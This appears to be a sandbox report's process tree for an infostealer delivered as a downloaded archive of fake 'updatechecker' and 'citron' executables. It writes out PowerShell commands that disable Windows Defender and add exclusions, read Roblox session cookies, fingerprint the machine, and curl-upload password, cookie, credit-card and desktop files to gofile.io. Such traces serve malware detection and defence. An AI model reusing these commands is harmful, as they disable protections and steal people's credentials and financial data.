"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://filelu.com/gkf7je1dsruo
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0dc23cb8,0x7ffd0dc23cc8,0x7ffd0dc23cd8
  2⤵
  PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:8
  2⤵
  PID:232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:2484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
  2⤵
  PID:1028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
  2⤵
  PID:1912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
  2⤵
  PID:1368
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4668 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2240 /prefetch:1
  2⤵
  PID:4860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6364 /prefetch:8
  2⤵
  PID:2456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3432 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
  2⤵
  PID:4236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:3984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7268 /prefetch:1
  2⤵
  PID:1468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:4516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:276
- C:\Users\Admin\Downloads\7z2408-x64.exe
  "C:\Users\Admin\Downloads\7z2408-x64.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1308 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,6468677919587243787,15493826405963157379,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6884 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3732

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2272

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5888

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\citronToppest\" -spe -an -ai#7zMap12246:88:7zEvent20383
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
PID:5384

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatechecker.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatechecker.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3916
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5852
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatechecker.exe"
  2⤵
  - Views/modifies file attributes
  PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatechecker.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2396
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5136
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5200
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5256
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5548
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatechecker.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4148
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4684

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6112
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5968
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:2724
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:1152
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2960
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4700

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
1⤵
- Executes dropped EXE
PID:3724
- C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
  "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:5040
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:4328
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:6052
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:5160
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:684
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:5036
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:6036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/SkipBackup.xlsx" https://store9.gofile.io/uploadFile"
    3⤵
    PID:568
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/SkipBackup.xlsx" https://store9.gofile.io/uploadFile
      4⤵
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/SuspendBackup.mp4v" https://store9.gofile.io/uploadFile"
    3⤵
    PID:4376
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/SuspendBackup.mp4v" https://store9.gofile.io/uploadFile
      4⤵
      PID:2592

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe"
1⤵
- Executes dropped EXE
PID:840
- C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe
  "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:4440
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:1544
  - - C:\Windows\system32\curl.exe
